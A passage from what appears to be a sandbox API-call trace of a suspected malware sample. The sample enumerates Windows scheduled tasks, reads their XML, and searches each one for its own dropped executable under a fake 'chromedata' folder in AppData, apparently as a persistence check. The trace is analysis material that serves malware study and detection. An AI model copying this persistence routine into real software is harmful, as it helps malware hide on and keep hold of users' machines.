	[0073.620] IRegisteredTaskCollection:get_Item (in: This=0x55fec0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff98) returned 0x0
	[0073.620] IRegisteredTask:get_Name (in: This=0x55ff98, pName=0x128e3c | out: pName=0x128e3c*="RacTask") returned 0x0
	[0073.620] IRegisteredTask:get_Xml (in: This=0x55ff98, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\RacEngn.dll,-502)</Description>\r\n    <URI>Microsoft\\Windows\\RAC\\RacTask</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"RACSQMTrigger\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <TimeTrigger id=\"RACTimeTrigger\">\r\n      <Repetition>\r\n        <Interval>PT1H</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-03-31T00:00:00Z</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT15M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{42060D27-CA53-41f5-96E4-B1E8169308A6}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.621] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\RacEngn.dll,-502)</Description>\r\n    <URI>Microsoft\\Windows\\RAC\\RacTask</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"RACSQMTrigger\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <TimeTrigger id=\"RACTimeTrigger\">\r\n      <Repetition>\r\n        <Interval>PT1H</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-03-31T00:00:00Z</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT15M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{42060D27-CA53-41f5-96E4-B1E8169308A6}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.622] IUnknown:Release (This=0x55ff98) returned 0x0
	[0073.622] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.622] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec0) returned 0x0
	[0073.622] ITaskFolderCollection:get_Count (in: This=0x55fec0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.622] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.622] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.622] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x19, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.622] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec0) returned 0x0
	[0073.622] IRegisteredTaskCollection:get_Count (in: This=0x55fec0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.622] IRegisteredTaskCollection:get_Item (in: This=0x55fec0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff98) returned 0x0
	[0073.622] IRegisteredTask:get_Name (in: This=0x55ff98, pName=0x128e3c | out: pName=0x128e3c*="MobilityManager") returned 0x0
	[0073.622] IRegisteredTask:get_Xml (in: This=0x55ff98, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Ras\\MobilityManager</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"Application\"\r\n                  &gt;\r\n                &lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <GroupId>S-1-5-19</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c463a0fc-794f-4fdf-9201-01938ceacafa}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.623] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Ras\\MobilityManager</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"Application\"\r\n                  &gt;\r\n                &lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <GroupId>S-1-5-19</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c463a0fc-794f-4fdf-9201-01938ceacafa}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.623] IUnknown:Release (This=0x55ff98) returned 0x0
	[0073.623] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.623] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec0) returned 0x0
	[0073.624] ITaskFolderCollection:get_Count (in: This=0x55fec0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.624] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.624] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.624] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1a, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.624] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.624] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.624] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.624] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="RegIdleBackup") returned 0x0
	[0073.624] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\regidle.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\regidle.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\Registry\\RegIdleBackup</URI>\r\n    <Description>$(@%systemroot%\\system32\\regidle.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>10</DaysInterval>\r\n      </ScheduleByDay>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Priority>5</Priority>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{ca767aa8-9157-4604-b64b-40747123d5f2}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.625] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\regidle.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\regidle.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\Registry\\RegIdleBackup</URI>\r\n    <Description>$(@%systemroot%\\system32\\regidle.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>10</DaysInterval>\r\n      </ScheduleByDay>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Priority>5</Priority>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{ca767aa8-9157-4604-b64b-40747123d5f2}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.625] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.625] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.625] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.626] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.626] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.626] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.626] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1b, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.626] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55ff08) returned 0x0
	[0073.626] IRegisteredTaskCollection:get_Count (in: This=0x55ff08, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0073.626] IUnknown:Release (This=0x55ff08) returned 0x0
	[0073.626] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55ff08) returned 0x0
	[0073.626] ITaskFolderCollection:get_Count (in: This=0x55ff08, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.626] IUnknown:Release (This=0x55ff08) returned 0x0
	[0073.626] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.626] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1c, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.627] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed8) returned 0x0
	[0073.627] IRegisteredTaskCollection:get_Count (in: This=0x55fed8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.627] IRegisteredTaskCollection:get_Item (in: This=0x55fed8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.627] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="RemoteAssistanceTask") returned 0x0
	[0073.627] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-11-08T17:18:32</Date>\r\n    <Source>$(@%systemroot%\\system32\\msra.exe,-687)</Source>\r\n    <Author>$(@%systemroot%\\system32\\msra.exe,-686)</Author>\r\n    <Description>$(@%systemroot%\\system32\\msra.exe,-688)</Description>\r\n    <URI>Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n      <Delay>PT15S</Delay>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec id=\"49b247cd-24d4-4ada-ad69-2d975a02b748\">\r\n      <Command>%windir%\\system32\\RAServer.exe</Command>\r\n      <Arguments>/offerraupdate</Arguments>\r\n      <WorkingDirectory>%windir%</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.628] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-11-08T17:18:32</Date>\r\n    <Source>$(@%systemroot%\\system32\\msra.exe,-687)</Source>\r\n    <Author>$(@%systemroot%\\system32\\msra.exe,-686)</Author>\r\n    <Description>$(@%systemroot%\\system32\\msra.exe,-688)</Description>\r\n    <URI>Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n      <Delay>PT15S</Delay>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec id=\"49b247cd-24d4-4ada-ad69-2d975a02b748\">\r\n      <Command>%windir%\\system32\\RAServer.exe</Command>\r\n      <Arguments>/offerraupdate</Arguments>\r\n      <WorkingDirectory>%windir%</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.628] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.628] IUnknown:Release (This=0x55fed8) returned 0x0
	[0073.628] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed8) returned 0x0
	[0073.628] ITaskFolderCollection:get_Count (in: This=0x55fed8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.628] IUnknown:Release (This=0x55fed8) returned 0x0
	[0073.628] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.629] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1d, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.629] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.629] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.629] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.629] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="WindowsParentalControls") returned 0x0
